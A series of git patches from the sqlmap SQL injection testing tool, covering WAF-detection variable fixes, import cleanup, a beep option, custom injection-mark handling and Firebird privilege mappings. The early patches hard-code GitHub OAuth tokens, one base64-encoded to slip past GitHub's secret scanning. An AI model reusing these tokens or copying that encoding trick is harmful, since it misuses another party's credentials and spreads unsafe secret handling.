From fa303ef8b1505c115b543b080ac722bfcdf2d52e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 10 Jul 2015 16:39:18 +0200
Subject: [PATCH 460/492] Minor update

---
 lib/core/settings.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index b6563cc83..e27d686c5 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -484,7 +484,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "f05e68171afd41a445b1fff80f369fae88b37968"
+GITHUB_REPORT_OAUTH_TOKEN = "6c16fa87190a100aceea8e71cb0c1ba8e4096c7a"
 
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

From a20da7a6778809f5927dac8f1dd13f3d536157fc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 12 Jul 2015 12:05:19 +0200
Subject: [PATCH 461/492] Patch for automatic reporting (GitHub has robots)

---
 lib/core/common.py   | 2 +-
 lib/core/settings.py | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 91029490b..16a377ea2 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2978,7 +2978,7 @@ def createGithubIssue(errMsg, excMsg):
 
 
         data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
-        req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
+        req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN.decode("base64")})
 
         try:
             f = urllib2.urlopen(req)
diff --git a/lib/core/settings.py b/lib/core/settings.py
index e27d686c5..62da62fd2 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -484,7 +484,7 @@ DEFAULT_COOKIE_DELIMITER = ';'
 FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
 
 # Github OAuth token used for creating an automatic Issue for unhandled exceptions
-GITHUB_REPORT_OAUTH_TOKEN = "6c16fa87190a100aceea8e71cb0c1ba8e4096c7a"
+GITHUB_REPORT_OAUTH_TOKEN = "YzQzM2M2YzgzMDExN2I5ZDMyYjAzNTIzODIwZDA2MDFmMmVjODI1Ng=="
 
 # Skip unforced HashDB flush requests below the threshold number of cached items
 HASHDB_FLUSH_THRESHOLD = 32

From 4800ea7311eee7350de7620f8afe8728e0a9b126 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 12 Jul 2015 12:17:26 +0200
Subject: [PATCH 462/492] Bug fix

---
 waf/edgecast.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/waf/edgecast.py b/waf/edgecast.py
index c59a3db68..ec2227055 100644
--- a/waf/edgecast.py
+++ b/waf/edgecast.py
@@ -13,12 +13,12 @@ from lib.core.settings import WAF_ATTACK_VECTORS
 __product__ = "EdgeCast WAF (Verizon)"
 
 def detect(get_page):
-    retval = False
+    retVal = False
 
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retVal = code == 400 and re.search(r"\AECDF", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
-        if retval:
+        if retVal:
             break
 
-    return retval
+    return retVal

From ffd949882711d5885438bb6a7d48bf242bbcf229 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 12 Jul 2015 12:24:06 +0200
Subject: [PATCH 463/492] Bug fix

---
 waf/sucuri.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/waf/sucuri.py b/waf/sucuri.py
index 61344628e..ba25802c7 100644
--- a/waf/sucuri.py
+++ b/waf/sucuri.py
@@ -13,12 +13,12 @@ from lib.core.settings import WAF_ATTACK_VECTORS
 __product__ = "Sucuri WebSite Firewall"
 
 def detect(get_page):
-    retval = False
+    retVal = False
 
     for vector in WAF_ATTACK_VECTORS:
         page, headers, code = get_page(get=vector)
         retVal = code == 403 and re.search(r"Sucuri/Cloudproxy", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
-        if retval:
+        if retVal:
             break
 
-    return retval
+    return retVal

From 16f8e4c8bafe302292251fffb2b2e22571546c6e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sun, 12 Jul 2015 12:25:02 +0200
Subject: [PATCH 464/492] Removing unused imports

---
 lib/controller/checks.py               | 3 ---
 lib/core/common.py                     | 6 +-----
 lib/core/dump.py                       | 2 --
 lib/core/option.py                     | 1 -
 lib/core/settings.py                   | 1 -
 lib/core/shell.py                      | 4 ++--
 lib/parse/payloads.py                  | 3 ---
 lib/request/connect.py                 | 1 -
 lib/request/httpshandler.py            | 1 -
 lib/utils/api.py                       | 1 -
 lib/utils/crawler.py                   | 3 ---
 lib/utils/hash.py                      | 1 -
 lib/utils/sqlalchemy.py                | 1 -
 plugins/dbms/mssqlserver/filesystem.py | 1 -
 sqlmap.py                              | 2 --
 waf/360.py                             | 1 -
 waf/anquanbao.py                       | 1 -
 waf/baidu.py                           | 1 -
 waf/safedog.py                         | 1 -
 waf/senginx.py                         | 3 ---
 20 files changed, 3 insertions(+), 35 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 4c1e14c7e..7840bf162 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -15,7 +15,6 @@ from subprocess import Popen as execute
 
 from extra.beep.beep import beep
 from lib.core.agent import agent
-from lib.core.common import arrayizeValue
 from lib.core.common import Backend
 from lib.core.common import extractRegexResult
 from lib.core.common import extractTextTagContent
@@ -46,7 +45,6 @@ from lib.core.datatype import AttribDict
 from lib.core.datatype import InjectionDict
 from lib.core.decorators import cachedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
-from lib.core.enums import CUSTOM_LOGGING
 from lib.core.enums import DBMS
 from lib.core.enums import HEURISTIC_TEST
 from lib.core.enums import HTTP_HEADER
@@ -66,7 +64,6 @@ from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import URI_HTTP_HEADER
-from lib.core.settings import LOWER_RATIO_BOUND
 from lib.core.settings import UPPER_RATIO_BOUND
 from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
 from lib.core.settings import IDS_WAF_CHECK_RATIO
diff --git a/lib/core/common.py b/lib/core/common.py
index 16a377ea2..6c5099d67 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -97,7 +97,6 @@ from lib.core.settings import DBMS_DIRECTORY_DICT
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
 from lib.core.settings import DEFAULT_MSSQL_SCHEMA
-from lib.core.settings import DESCRIPTION
 from lib.core.settings import DUMMY_USER_INJECTION
 from lib.core.settings import DYNAMICITY_MARK_LENGTH
 from lib.core.settings import ERROR_PARSING_REGEXES
@@ -134,9 +133,7 @@ from lib.core.settings import REFLECTED_MAX_REGEX_PARTS
 from lib.core.settings import REFLECTED_REPLACEMENT_REGEX
 from lib.core.settings import REFLECTED_VALUE_MARKER
 from lib.core.settings import REFLECTIVE_MISS_THRESHOLD
-from lib.core.settings import REVISION
 from lib.core.settings import SENSITIVE_DATA_REGEX
-from lib.core.settings import SITE
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import TEXT_TAG_REGEX
 from lib.core.settings import TIME_STDEV_COEFF
@@ -146,7 +143,6 @@ from lib.core.settings import URI_QUESTION_MARKER
 from lib.core.settings import URLENCODE_CHAR_LIMIT
 from lib.core.settings import URLENCODE_FAILSAFE_CHARS
 from lib.core.settings import USER_AGENT_ALIASES
-from lib.core.settings import VERSION
 from lib.core.settings import VERSION_STRING
 from lib.core.threads import getCurrentThreadData
 from lib.utils.sqlalchemy import _sqlalchemy
@@ -1027,7 +1023,7 @@ def checkFile(filename):
 
     if valid:
         try:
-            with open(filename, "rb") as f:
+            with open(filename, "rb"):
                 pass
         except:
             valid = False
diff --git a/lib/core/dump.py b/lib/core/dump.py
index c6272e4d3..d3b9cc799 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -6,7 +6,6 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import cgi
-import codecs
 import hashlib
 import os
 import re
@@ -22,7 +21,6 @@ from lib.core.common import normalizeUnicode
 from lib.core.common import openFile
 from lib.core.common import prioritySortColumns
 from lib.core.common import randomInt
-from lib.core.common import randomStr
 from lib.core.common import safeCSValue
 from lib.core.common import unicodeencode
 from lib.core.common import unsafeSQLIdentificatorNaming
diff --git a/lib/core/option.py b/lib/core/option.py
index 97f211e17..33345c57b 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -53,7 +53,6 @@ from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import runningAsAdmin
 from lib.core.common import safeExpandUser
-from lib.core.common import sanitizeStr
 from lib.core.common import setOptimize
 from lib.core.common import setPaths
 from lib.core.common import singleTimeWarnMessage
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 62da62fd2..a356390d9 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -6,7 +6,6 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import os
-import random
 import re
 import subprocess
 import string
diff --git a/lib/core/shell.py b/lib/core/shell.py
index d4ca035e0..1e7f35d50 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -43,7 +43,7 @@ def saveHistory(completion=None):
         historyPath = paths.SQLMAP_SHELL_HISTORY
 
     try:
-        with open(historyPath, "w+") as f:
+        with open(historyPath, "w+"):
             pass
     except:
         pass
@@ -92,7 +92,7 @@ class CompleterNG(rlcompleter.Completer):
                     matches.append(word)
 
         return matches
-        
+
 def autoCompletion(completion=None, os=None, commands=None):
     if not readlineAvailable():
         return
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index c98a7f014..a96867082 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -10,7 +10,6 @@ import os
 from xml.etree import ElementTree as et
 
 from lib.core.data import conf
-from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.datatype import AttribDict
 from lib.core.exception import SqlmapInstallationException
@@ -89,8 +88,6 @@ def loadPayloads():
     for payloadFile in payloadFiles:
         payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
 
-        #logger.debug("Parsing payloads from file '%s'" % payloadFile)
-
         try:
             doc = et.parse(payloadFilePath)
         except Exception, ex:
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 94d1e4576..94ce9887e 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -822,7 +822,6 @@ class Connect(object):
                 retVal = paramString
                 match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
                 if match:
-                    origValue = match.group("value")
                     retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
                 return retVal
 
diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py
index bbd291e15..6906f4686 100644
--- a/lib/request/httpshandler.py
+++ b/lib/request/httpshandler.py
@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
 
 import httplib
 import socket
-import sys
 import urllib2
 
 from lib.core.data import kb
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 357d4d3b5..c007289b5 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -8,7 +8,6 @@ See the file 'doc/COPYING' for copying permission
 
 import logging
 import os
-import shutil
 import sqlite3
 import sys
 import tempfile
diff --git a/lib/utils/crawler.py b/lib/utils/crawler.py
index ffac14e13..be47608e1 100644
--- a/lib/utils/crawler.py
+++ b/lib/utils/crawler.py
@@ -5,7 +5,6 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import codecs
 import httplib
 import os
 import re
@@ -19,13 +18,11 @@ from lib.core.common import findPageForms
 from lib.core.common import openFile
 from lib.core.common import readInput
 from lib.core.common import safeCSValue
-from lib.core.common import singleTimeWarnMessage
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import SqlmapConnectionException
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
-from lib.core.settings import UNICODE_ENCODING
 from lib.core.threads import getCurrentThreadData
 from lib.core.threads import runThreads
 from lib.parse.sitemap import parseSitemap
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index bc3f06f2a..123b93ee7 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -59,7 +59,6 @@ from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.enums import DBMS
 from lib.core.enums import HASH
-from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.settings import COMMON_PASSWORD_SUFFIXES
 from lib.core.settings import COMMON_USER_COLUMNS
diff --git a/lib/utils/sqlalchemy.py b/lib/utils/sqlalchemy.py
index 9e24bba30..1b654ef2f 100644
--- a/lib/utils/sqlalchemy.py
+++ b/lib/utils/sqlalchemy.py
@@ -8,7 +8,6 @@ See the file 'doc/COPYING' for copying permission
 import imp
 import logging
 import os
-import re
 import sys
 import warnings
 
diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py
index eca533d01..53e197a0d 100644
--- a/plugins/dbms/mssqlserver/filesystem.py
+++ b/plugins/dbms/mssqlserver/filesystem.py
@@ -343,7 +343,6 @@ class Filesystem(GenericFilesystem):
         logger.info(infoMsg)
 
         chunkMaxSize = 500
-        dFileName = ntpath.basename(dFile)
 
         randFile = "tmpf%s.txt" % randomStr(lowercase=True)
         randFilePath = "%s\%s" % (tmpPath, randFile)
diff --git a/sqlmap.py b/sqlmap.py
index 81b3e756e..161aa6727 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -12,7 +12,6 @@ import os
 import re
 import shutil
 import sys
-import tempfile
 import time
 import traceback
 import warnings
@@ -28,7 +27,6 @@ from lib.core.common import createGithubIssue
 from lib.core.common import dataToStdout
 from lib.core.common import getUnicode
 from lib.core.common import maskSensitiveData
-from lib.core.common import setColor
 from lib.core.common import setPaths
 from lib.core.common import weAreFrozen
 from lib.core.data import cmdLineOptions
diff --git a/waf/360.py b/waf/360.py
index cc8b4c615..86c251c20 100644
--- a/waf/360.py
+++ b/waf/360.py
@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
 
 import re
 
-from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "360 Web Application Firewall (360)"
diff --git a/waf/anquanbao.py b/waf/anquanbao.py
index 430ce942a..6842c8a35 100644
--- a/waf/anquanbao.py
+++ b/waf/anquanbao.py
@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
 
 import re
 
-from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "Anquanbao Web Application Firewall (Anquanbao)"
diff --git a/waf/baidu.py b/waf/baidu.py
index fc9cc9d21..7a15feadb 100644
--- a/waf/baidu.py
+++ b/waf/baidu.py
@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
 
 import re
 
-from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "Yunjiasu Web Application Firewall (Baidu)"
diff --git a/waf/safedog.py b/waf/safedog.py
index 63c7fdddd..31b706e18 100644
--- a/waf/safedog.py
+++ b/waf/safedog.py
@@ -7,7 +7,6 @@ See the file 'doc/COPYING' for copying permission
 
 import re
 
-from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "Safedog Web Application Firewall (Safedog)"
diff --git a/waf/senginx.py b/waf/senginx.py
index a4bdb1bf2..15a4223f2 100644
--- a/waf/senginx.py
+++ b/waf/senginx.py
@@ -5,9 +5,6 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
-import re
-
-from lib.core.enums import HTTP_HEADER
 from lib.core.settings import WAF_ATTACK_VECTORS
 
 __product__ = "SEnginx (Neusoft Corporation)"

From fdc8e664dff305aca19acf143c7767b9a7626881 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 13 Jul 2015 23:55:46 +0200
Subject: [PATCH 465/492] Updating --beep functionality (ML request)

---
 lib/core/common.py   | 5 +++++
 lib/parse/cmdline.py | 2 +-
 sqlmap.conf          | 2 +-
 3 files changed, 7 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 6c5099d67..ca63be94e 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -43,6 +43,7 @@ from xml.dom import minidom
 from xml.sax import parse
 from xml.sax import SAXParseException
 
+from extra.beep.beep import beep
 from extra.cloak.cloak import decloak
 from extra.safe2bin.safe2bin import safecharencode
 from lib.core.bigarray import BigArray
@@ -931,6 +932,10 @@ def readInput(message, default=None, checkBatch=True):
             retVal = default
         else:
             logging._acquireLock()
+
+            if conf.get("beep"):
+                beep()
+
             dataToStdout("\r%s" % message, forceOutput=True, bold=True)
             kb.prependFlag = False
 
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 177cb063e..23add4a9d 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -689,7 +689,7 @@ def cmdLineParser():
                                   help="Set question answers (e.g. \"quit=N,follow=N\")")
 
         miscellaneous.add_option("--beep", dest="beep", action="store_true",
-                                  help="Make a beep sound when SQL injection is found")
+                                  help="Beep on question and/or when SQL injection is found")
 
         miscellaneous.add_option("--cleanup", dest="cleanup",
                                   action="store_true",
diff --git a/sqlmap.conf b/sqlmap.conf
index 2ca8c6dd6..d7db6c376 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -721,7 +721,7 @@ alert =
 # Set question answers (e.g. "quit=N,follow=N").
 answers =
 
-# Make a beep sound when SQL injection is found.
+# Beep on question and/or when SQL injection is found.
 # Valid: True or False
 beep = False
 

From 1aafe85a3aa9a669eb2c0eeffd8df1048f9907b1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 15 Jul 2015 11:15:06 +0200
Subject: [PATCH 466/492] Fixes #1299

---
 lib/core/common.py            | 6 +++---
 plugins/generic/filesystem.py | 2 +-
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index ca63be94e..8708f47c5 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -872,7 +872,7 @@ def dataToOutFile(filename, data):
         retVal = os.path.join(conf.filePath, filePathToSafeString(filename))
 
         try:
-            with openFile(retVal, "wb") as f:
+            with open(retVal, "w+b") as f:
                 f.write(data)
         except IOError, ex:
             errMsg = "something went wrong while trying to write "
@@ -3714,7 +3714,7 @@ def applyFunctionRecursively(value, function):
 
     return retVal
 
-def decodeHexValue(value):
+def decodeHexValue(value, raw=False):
     """
     Returns value decoded from DBMS specific hexadecimal representation
 
@@ -3729,7 +3729,7 @@ def decodeHexValue(value):
         if value and isinstance(value, basestring) and len(value) % 2 == 0:
             retVal = hexdecode(retVal)
 
-            if not kb.binaryField:
+            if not kb.binaryField and not raw:
                 if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
                     try:
                         retVal = retVal.decode("utf-16-le")
diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py
index b069eabfe..0ff2a4a2c 100644
--- a/plugins/generic/filesystem.py
+++ b/plugins/generic/filesystem.py
@@ -232,7 +232,7 @@ class Filesystem:
                 fileContent = newFileContent
 
             if fileContent is not None:
-                fileContent = decodeHexValue(fileContent)
+                fileContent = decodeHexValue(fileContent, True)
 
                 if fileContent:
                     localFilePath = dataToOutFile(remoteFile, fileContent)

From 49212ec920595e4e242ed81d3476fe72e4dcb8ca Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 17 Jul 2015 09:56:24 +0200
Subject: [PATCH 467/492] Fixes #1302

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 8708f47c5..8f6ca2954 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2281,7 +2281,7 @@ def findMultipartPostBoundary(post):
     candidates = []
 
     for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
-        _ = match.group(1)
+        _ = match.group(1).strip().strip('-')
         if _ in done:
             continue
         else:

From 00f190fc925510a2218128534700575fcaf57c1c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 17 Jul 2015 10:14:35 +0200
Subject: [PATCH 468/492] Fixes #1303

---
 lib/controller/controller.py |  3 ++
 lib/core/option.py           |  1 +
 lib/core/target.py           | 80 +++++++++++++++---------------------
 3 files changed, 37 insertions(+), 47 deletions(-)

diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 90043a5b0..52f2c8c28 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -430,6 +430,9 @@ def start():
                     if skip:
                         continue
 
+                    if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
+                        continue
+
                     if place not in conf.paramDict:
                         continue
 
diff --git a/lib/core/option.py b/lib/core/option.py
index 33345c57b..75885f878 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1864,6 +1864,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.technique = None
     kb.tempDir = None
     kb.testMode = False
+    kb.testOnlyCustom = False
     kb.testQueryCount = 0
     kb.testType = None
     kb.threadContinue = True
diff --git a/lib/core/target.py b/lib/core/target.py
index 0fb70769c..442a8cd7a 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -80,7 +80,6 @@ def _setRequestParams():
         return
 
     testableParameters = False
-    skipHeaders = False
 
     # Perform checks on GET parameters
     if conf.parameters.get(PLACE.GET):
@@ -125,16 +124,7 @@ def _setRequestParams():
                 kb.processUserMarks = not test or test[0] not in ("n", "N")
 
                 if kb.processUserMarks:
-                    skipHeaders = True
-
-                    conf.parameters.clear()
-                    conf.paramDict.clear()
-
-                    if "=%s" % CUSTOM_INJECTION_MARK_CHAR in conf.data:
-                        warnMsg = "it seems that you've provided empty parameter value(s) "
-                        warnMsg += "for testing. Please, always use only valid parameter values "
-                        warnMsg += "so sqlmap could be able to run properly"
-                        logger.warn(warnMsg)
+                    kb.testOnlyCustom = True
 
         if not (kb.processUserMarks and CUSTOM_INJECTION_MARK_CHAR in conf.data):
             if re.search(JSON_RECOGNITION_REGEX, conf.data):
@@ -249,10 +239,7 @@ def _setRequestParams():
                     kb.processUserMarks = not test or test[0] not in ("n", "N")
 
                     if kb.processUserMarks:
-                        skipHeaders = True
-
-                        conf.parameters.clear()
-                        conf.paramDict.clear()
+                        kb.testOnlyCustom = True
 
                         if "=%s" % CUSTOM_INJECTION_MARK_CHAR in _:
                             warnMsg = "it seems that you've provided empty parameter value(s) "
@@ -317,50 +304,49 @@ def _setRequestParams():
             if conf.get(item):
                 conf[item] = conf[item].replace(CUSTOM_INJECTION_MARK_CHAR, "")
 
-    if not skipHeaders:
-        # Perform checks on Cookie parameters
-        if conf.cookie:
-            conf.parameters[PLACE.COOKIE] = conf.cookie
-            paramDict = paramToDict(PLACE.COOKIE, conf.cookie)
+    # Perform checks on Cookie parameters
+    if conf.cookie:
+        conf.parameters[PLACE.COOKIE] = conf.cookie
+        paramDict = paramToDict(PLACE.COOKIE, conf.cookie)
 
-            if paramDict:
-                conf.paramDict[PLACE.COOKIE] = paramDict
-                testableParameters = True
+        if paramDict:
+            conf.paramDict[PLACE.COOKIE] = paramDict
+            testableParameters = True
 
-        # Perform checks on header values
-        if conf.httpHeaders:
-            for httpHeader, headerValue in conf.httpHeaders:
-                # Url encoding of the header values should be avoided
-                # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
+    # Perform checks on header values
+    if conf.httpHeaders:
+        for httpHeader, headerValue in conf.httpHeaders:
+            # Url encoding of the header values should be avoided
+            # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value
 
-                httpHeader = httpHeader.title()
+            httpHeader = httpHeader.title()
 
-                if httpHeader == HTTP_HEADER.USER_AGENT:
-                    conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
+            if httpHeader == HTTP_HEADER.USER_AGENT:
+                conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue)
 
-                    condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES)))
+                condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES)))
 
-                    if condition:
-                        conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
-                        testableParameters = True
+                if condition:
+                    conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: headerValue}
+                    testableParameters = True
 
-                elif httpHeader == HTTP_HEADER.REFERER:
-                    conf.parameters[PLACE.REFERER] = urldecode(headerValue)
+            elif httpHeader == HTTP_HEADER.REFERER:
+                conf.parameters[PLACE.REFERER] = urldecode(headerValue)
 
-                    condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES)))
+                condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES)))
 
-                    if condition:
-                        conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
-                        testableParameters = True
+                if condition:
+                    conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue}
+                    testableParameters = True
 
-                elif httpHeader == HTTP_HEADER.HOST:
-                    conf.parameters[PLACE.HOST] = urldecode(headerValue)
+            elif httpHeader == HTTP_HEADER.HOST:
+                conf.parameters[PLACE.HOST] = urldecode(headerValue)
 
-                    condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES)))
+                condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES)))
 
-                    if condition:
-                        conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}
-                        testableParameters = True
+                if condition:
+                    conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue}
+                    testableParameters = True
 
     if not conf.parameters:
         errMsg = "you did not provide any GET, POST and Cookie "

From a7c4400cc9516e28de9492b5ada482339158d28a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 17 Jul 2015 14:20:51 +0200
Subject: [PATCH 469/492] Fixes #1304

---
 lib/core/dicts.py | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 0fa0f4685..b6a0ea2ba 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -105,13 +105,22 @@ PGSQL_PRIVS = {
                     3: "catupd",
                 }
 
+# Reference(s): http://stackoverflow.com/a/17672504
+#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
+
 FIREBIRD_PRIVS = {
                     "S": "SELECT",
                     "I": "INSERT",
                     "U": "UPDATE",
                     "D": "DELETE",
-                    "R": "REFERENCES",
+                    "R": "REFERENCE",
                     "E": "EXECUTE",
+                    "X": "EXECUTE",
+                    "A": "ALL",
+                    "M": "MEMBER",
+                    "T": "DECRYPT",
+                    "E": "ENCRYPT",
+                    "B": "SUBSCRIBE",
                 }
 
 DB2_PRIVS = {

From 21e8182ac67af54968753dc82175eaca50e3261e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 18 Jul 2015 17:01:34 +0200
Subject: [PATCH 470/492] Fixes #1305

---
 lib/controller/checks.py     |   9 +--
 lib/controller/controller.py |  66 +++++++++++----------
 lib/request/connect.py       |  29 +++++-----
 lib/request/inject.py        |  12 ++--
 lib/techniques/union/test.py | 109 ++++++++++++++++++-----------------
 plugins/generic/databases.py |  43 +++++++-------
 6 files changed, 138 insertions(+), 130 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 7840bf162..39c472e73 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -1249,10 +1249,10 @@ def checkNullConnection():
     infoMsg = "testing NULL connection to the target URL"
     logger.info(infoMsg)
 
-    pushValue(kb.pageCompress)
-    kb.pageCompress = False
-
     try:
+        pushValue(kb.pageCompress)
+        kb.pageCompress = False
+
         page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
 
         if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
@@ -1282,7 +1282,8 @@ def checkNullConnection():
         errMsg = getUnicode(errMsg)
         raise SqlmapConnectionException(errMsg)
 
-    kb.pageCompress = popValue()
+    finally:
+        kb.pageCompress = popValue()
 
